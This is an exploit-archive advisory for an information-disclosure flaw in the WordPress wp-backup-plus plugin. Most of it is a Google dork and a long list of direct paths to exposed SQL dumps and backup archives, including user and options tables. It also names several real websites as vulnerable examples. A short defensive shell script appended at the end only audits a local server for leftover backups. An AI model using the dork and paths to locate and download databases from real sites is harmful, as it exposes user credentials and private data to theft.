WordPress wp-backup-plus Plugins Database Backup Information Disclosure Vulnerability

2018.11.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################
# Exploit Title : WordPress wp-backup-plus Plugins Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/11/2018
# Vendor Homepage : wpbackupplus.com ~ wordpress.org
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#       CWE-23 - [ Relative Path Traversal ]
#       CWE-200 - [ Information Exposure ]
# Other Similar Exploit (with less complete information) : exploit-db.com/exploits/34124/
#################################################################################################
# Admin Panel Login Path : /wp-login.php
# Exploit :
/wp-content/uploads/wp-backup-plus/temp/database.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
/wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql
/wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql
/wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql
/wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql
/wp-content/uploads/wp-backup-plus/temp/wp_comments.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql
/wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql
/wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql
/wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql
/wp-content/uploads/wp-backup-plus/temp/wp_links.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql
/wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql
/wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql
/wp-content/uploads/wp-backup-plus/temp/wp_options.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql
/wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pls.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql
/wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql
/wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql
/wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql
/wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql
/wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql
/wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql
/wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql
/wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql
/wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql
/wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql
/wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql
/wp-content/uploads/wp-backup-plus/temp/wp_terms.sql
/wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql
/wp-content/uploads/wp-backup-plus/temp/wp_users.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql
/wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql
/wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql
/wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql
/wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20vIjtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip
/wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20vIjtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip.log
#################################################################################################
# Example Vulnerable Sites =>
[+] wassupblog.com/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
[+] curtiswrightoutfitters.com/wp-content/uploads/wp-backup-plus/temp/database.sql
[+] wpbackupplus.com/wp-content/uploads/wp-backup-plus/temp/
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
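A defender-side audit helper, added here and not part of the advisory: run on the web server against the WordPress document root, it lists any backup artifacts the plugin left under its uploads directory (the .sql dumps, .zip archives and .zip.log files the advisory names) and checks whether an Apache .htaccess deny rule shields that directory. The sample document root and the .htaccess check are constructed assumptions, not something the advisory describes.

```shell
#!/bin/sh
# Audit helper (added example, not from the advisory): report wp-backup-plus
# artifacts under a WordPress docroot and check for a deny rule on that dir.

# Print every backup artifact under <docroot>/wp-content/uploads/wp-backup-plus,
# one path per line, sorted. Nothing is printed when the directory is absent.
find_backup_artifacts() {
    dir="$1/wp-content/uploads/wp-backup-plus"
    [ -d "$dir" ] || return 0
    find "$dir" -type f \( -name '*.sql' -o -name '*.zip' -o -name '*.log' \) | sort
}

# Number of artifacts found; a monitoring job would alert when this is non-zero.
count_backup_artifacts() {
    find_backup_artifacts "$1" | wc -l | tr -d ' '
}

# Return 0 when an .htaccess in the plugin's upload dir carries a deny rule
# (Apache 2.2 "deny from all" or Apache 2.4 "Require all denied"), else 1.
# Assumption: an Apache deployment; nginx needs an equivalent location block.
has_deny_rule() {
    htaccess="$1/wp-content/uploads/wp-backup-plus/.htaccess"
    [ -f "$htaccess" ] || return 1
    grep -Eiq 'deny from all|Require all denied' "$htaccess"
}

# Constructed sample docroot mirroring the advisory's layout so the script
# runs offline; the zip name is a placeholder, not a real backup name.
make_sample_docroot() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads/wp-backup-plus/temp"
    : > "$root/wp-content/uploads/wp-backup-plus/temp/database.sql"
    : > "$root/wp-content/uploads/wp-backup-plus/temp/wp_users.sql"
    : > "$root/wp-content/uploads/wp-backup-plus/wpbp-PLACEHOLDER.zip"
    : > "$root/wp-content/uploads/wp-backup-plus/wpbp-PLACEHOLDER.zip.log"
    printf '%s\n' "$root"
}

# Stand-alone run against the constructed sample (pass a real docroot instead).
if [ "${1:-}" = "--demo" ]; then
    root=$(make_sample_docroot)
    echo "artifacts: $(count_backup_artifacts "$root")"
    has_deny_rule "$root" && echo "deny rule: present" || echo "deny rule: MISSING"
    find_backup_artifacts "$root"
fi
```

Invoke with `--demo` to exercise it on the constructed tree, or pass the real document root to the functions; a non-zero artifact count with a missing deny rule is the condition the advisory describes.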


Copyright 2024, cxsecurity.com